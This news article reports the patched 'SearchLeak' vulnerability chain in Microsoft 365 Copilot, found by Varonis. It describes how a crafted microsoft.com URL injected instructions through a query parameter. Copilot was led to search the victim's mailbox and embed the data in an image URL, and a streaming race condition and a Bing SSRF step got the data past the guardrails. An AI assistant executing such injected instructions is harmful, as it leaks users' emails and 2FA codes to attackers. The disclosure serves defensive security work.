Share

    • Vulnerability in Microsoft 365 Copilot Dubbed 'SearchLeak' Patched

    By Any June 16, 2026
    Microsoft has patched a critical vulnerability chain named 'SearchLeak' in its M365 Copilot platform. Discovered by security firm Varonis, the exploit could have allowed attackers to exfiltrate sensitive user data, including emails and 2FA codes, with a single click on a crafted URL.
    Vulnerability in Microsoft 365 Copilot Dubbed 'SearchLeak' Patched

    Vulnerability in Microsoft 365 Copilot Dubbed ‘SearchLeak’ Patched A newly revealed security flaw in Microsoft 365 Copilot shows how a single malicious link could have silently turned the AI assistant into a data exfiltration tool, before Microsoft moved to close the hole.

    Discovery and disclosure

    In early June, researchers at Varonis Threat Labs uncovered a chained set of three bugs in Microsoft 365 Copilot Enterprise Search, later dubbed “SearchLeak.” The issue, summarized by one report as “a single click on a Microsoft link could have drained your inbox,” allowed an attacker to steal emails, calendar entries, and indexed files with no further interaction from the victim. Microsoft assigned the flaw CVE-2026-42824 on June 4, rating it “critical” under its internal system, and patched it on the Copilot backend last Tuesday, requiring no customer action.

    How the SearchLeak chain worked

    Varonis’ proof-of-concept showed that an attacker could craft a URL on a legitimate microsoft.com domain, exploiting the q query parameter to inject instructions that Copilot would execute as if they were the user’s own request. This “Parameter-to-Prompt Injection” told Copilot to search a victim’s mailbox, extract sensitive data, and embed it into an image URL—enabling exfiltration in the background while the user saw only a normal page.

    A race condition in how Copilot’s responses are streamed let malicious markup execute before Microsoft’s guardrails wrapped the output in safe code blocks, so an injected image tag could fire its outbound request before being neutralized. A server-side request forgery step then abused Bing’s “Search by Image” endpoint—allowed by Microsoft’s own content security policy—to deliver the stolen data to an attacker-controlled server.

    Wider implications for AI security

    Security analysts argue the incident highlights a structural weakness in current LLM security: models “are unable to distinguish between instructions provided by users and those snuck into third-party content,” forcing vendors like Microsoft to rely on complex, ad hoc guardrails that attackers can still “catapult over.” The SearchLeak case, which even allowed retrieval of two-factor authentication codes from email, underscores how AI assistants wired into enterprise data can become high-impact attack surfaces if their trust boundaries are not rigorously enforced.

    Continue reading https://foxvector.com/stories/019ed215-789f-0d34-71dd-2b502a31a3f9

    Write a comment